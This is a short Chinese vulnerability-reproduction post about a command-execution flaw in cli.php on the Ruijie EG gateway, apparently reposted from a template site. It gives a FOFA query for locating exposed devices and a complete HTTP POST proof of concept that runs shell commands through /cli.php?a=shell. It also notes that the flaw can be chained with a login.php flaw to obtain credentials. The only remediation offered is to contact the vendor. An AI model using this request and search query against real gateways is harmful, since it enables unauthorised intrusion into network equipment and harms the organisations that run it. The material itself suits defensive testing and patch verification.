Nx01 产品简介
锐捷EG易网关是一款综合网关,由锐捷网络完全自主研发。它集成了先进的软硬件体系架构,配备了DPI深入分析引擎、行为分析/管理引擎,可以在保证网络出口高效转发的条件下,提供专业的流控功能、出色的URL过滤以及本地化的日志存储/审计服务。
Nx02 漏洞描述
锐捷EG易网关cli.php存在后台命令执行漏洞,此漏洞需要权限,可搭配login.php命令执行漏洞获取登陆密码结合使用。
Nx03 产品主页
fofa-query: app="Ruijie-EG易网关" && body="/login.php?a=version"
Nx04 漏洞复现
POC:文章来源:https://www.toymoban.com/news/detail-815249.html
POST /cli.php?a=shell HTTP/1.1
Host: {{Hostname}}
Connection: close
Content-Length: 28
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: RUIJIEID=;
notdelay=true&command=whoami
Nx05 修复建议
建议联系软件厂商进行处理。文章来源地址https://www.toymoban.com/news/detail-815249.html
到了这里,关于【漏洞复现】锐捷EG易网关cli.php后台命令执行漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!
